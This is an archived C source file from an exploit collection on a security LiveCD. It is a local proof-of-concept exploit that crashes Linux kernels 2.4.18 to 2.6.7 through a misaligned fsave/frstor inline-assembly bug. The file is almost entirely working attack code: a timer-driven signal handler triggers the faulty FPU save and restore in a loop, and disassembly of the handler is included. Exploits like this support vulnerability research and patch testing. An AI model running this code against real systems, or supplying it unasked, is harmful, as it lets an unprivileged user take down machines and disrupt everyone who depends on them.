home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / linux / local / kernelInlineASMDoSDetail.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  1KB  |  72 lines

  1. /* --------------------
  2.  * frstor Local Kernel exploit
  3.  * Crashes any kernel from 2.4.18
  4.  * to 2.6.7 because frstor in assembler inline offsets in memory by 4.
  5.  * Original proof of concept code
  6.  * by stian_@_nixia.no.
  7.  * Added some stuff by lorenzo_@_gnu.org
  8.  * and fixed the fsave line with (*fpubuf).
  9.  * --------------------
  10.  */
  11.  
  12. /*
  13. ---------
  14. Some debugging information made
  15. available by stian_@_nixia.no
  16. ---------
  17. TakeDown:
  18.         pushl   %ebp
  19.         movl    %esp, %ebp
  20.         subl    $136, %esp
  21.         leal    -120(%ebp), %eax
  22.         movl    %eax, -124(%ebp)
  23. #APP
  24.         fsave -124(%ebp)
  25.  
  26. #NO_APP
  27.         subl    $4, %esp
  28.         pushl   $1
  29.         pushl   $.LC0
  30.         pushl   $2
  31.         call    write
  32.         addl    $16, %esp
  33.         leal    -120(%ebp), %eax
  34.         movl    %eax, -128(%ebp)
  35. #APP
  36.         frstor -128(%ebp)
  37.  
  38. #NO_APP
  39.         leave
  40.         ret
  41. */
  42.  
  43. #include <sys/time.h>
  44. #include <signal.h>
  45. #include <unistd.h>
  46.  
  47. static void TakeDown(int ignore)
  48. {
  49.  char fpubuf[108];
  50. // __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
  51. __asm__ __volatile__ ("fsave %0\n" : : "m"(*fpubuf));
  52.  write(2, "*", 1);
  53.  __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
  54. }
  55.  
  56.  
  57. int main(int argc, char *argv[])
  58. {
  59.  struct itimerval spec;
  60.  signal(SIGALRM, TakeDown);
  61.  spec.it_interval.tv_sec=0;
  62.  spec.it_interval.tv_usec=100;
  63.  spec.it_value.tv_sec=0;
  64.  spec.it_value.tv_usec=100;
  65.  setitimer(ITIMER_REAL, &spec, NULL);
  66.  while(1)
  67.   write(1, ".", 1);
  68.  
  69.  return 0;
  70. }
  71. // <<EOF
  72.